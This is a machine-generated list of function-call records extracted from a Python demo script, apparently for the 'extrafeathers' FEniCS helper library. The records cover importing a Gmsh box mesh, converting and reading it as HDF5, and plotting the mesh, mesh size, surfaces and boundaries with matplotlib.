[((233, 311), 'extrafeathers.meshiowrapper.import_gmsh', 'meshiowrapper.import_gmsh', ([], {'src': '"""demo/meshes/box.msh"""', 'dst': '"""demo/meshes/box.h5"""'}), "(src='demo/meshes/box.msh', dst='demo/meshes/box.h5')\n", (258, 311), False, 'from extrafeathers import meshiowrapper\n'), ((406, 456), 'extrafeathers.meshiowrapper.read_hdf5_mesh', 'meshiowrapper.read_hdf5_mesh', (['"""demo/meshes/box.h5"""'], {}), "('demo/meshes/box.h5')\n", (434, 456), False, 'from extrafeathers import meshiowrapper\n'), ((485, 498), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (495, 498), True, 'import matplotlib.pyplot as plt\n'), ((499, 508), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (506, 508), True, 'import matplotlib.pyplot as plt\n'), ((524, 544), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(1)'], {}), '(2, 2, 1)\n', (535, 544), True, 'import matplotlib.pyplot as plt\n'), ((545, 562), 'dolfin.plot', 'dolfin.plot', (['mesh'], {}), '(mesh)\n', (556, 562), False, 'import dolfin\n'), ((563, 581), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mesh"""'], {}), "('Mesh')\n", (573, 581), True, 'import matplotlib.pyplot as plt\n'), ((601, 621), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (612, 621), True, 'import matplotlib.pyplot as plt\n'), ((673, 694), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['theplot'], {}), '(theplot)\n', (685, 694), True, 'import matplotlib.pyplot as plt\n'), ((695, 724), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Local mesh size"""'], {}), "('Local mesh size')\n", (705, 724), True, 'import matplotlib.pyplot as plt\n'), ((754, 774), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (765, 774), True, 'import matplotlib.pyplot as plt\n'), ((785, 810), 'dolfin.plot', 'dolfin.plot', (['domain_parts'], {}), '(domain_parts)\n', (796, 810), False, 'import dolfin\n'), ((811, 832), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['theplot'], {}), '(theplot)\n', (823, 832), True, 'import matplotlib.pyplot as plt\n'), ((833, 861), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Phys. surfaces"""'], {}), "('Phys. surfaces')\n", (843, 861), True, 'import matplotlib.pyplot as plt\n'), ((880, 900), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(4)'], {}), '(2, 2, 4)\n', (891, 900), True, 'import matplotlib.pyplot as plt\n'), ((901, 980), 'extrafeathers.plotmagic.plot_facet_meshfunction', 'plotmagic.plot_facet_meshfunction', (['boundary_parts'], {'invalid_values': '[2 ** 64 - 1]'}), '(boundary_parts, invalid_values=[2 ** 64 - 1])\n', (934, 980), False, 'from extrafeathers import plotmagic\n'), ((979, 997), 'matplotlib.pyplot.axis', 'plt.axis', (['"""scaled"""'], {}), "('scaled')\n", (987, 997), True, 'import matplotlib.pyplot as plt\n'), ((998, 1020), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1008, 1020), True, 'import matplotlib.pyplot as plt\n'), ((1021, 1051), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Phys. boundaries"""'], {}), "('Phys. boundaries')\n", (1031, 1051), True, 'import matplotlib.pyplot as plt\n'), ((1053, 1078), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Structure"""'], {}), "('Structure')\n", (1065, 1078), True, 'import matplotlib.pyplot as plt\n'), ((1080, 1090), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1088, 1090), True, 'import matplotlib.pyplot as plt\n'), ((212, 230), 'pathlib.Path.cwd', 'pathlib.Path.cwd', ([], {}), '()\n', (228, 230), False, 'import pathlib\n'), ((644, 671), 'extrafeathers.meshfunction.meshsize', 'meshfunction.meshsize', (['mesh'], {}), '(mesh)\n', (665, 671), False, 'from extrafeathers import meshfunction\n')]
|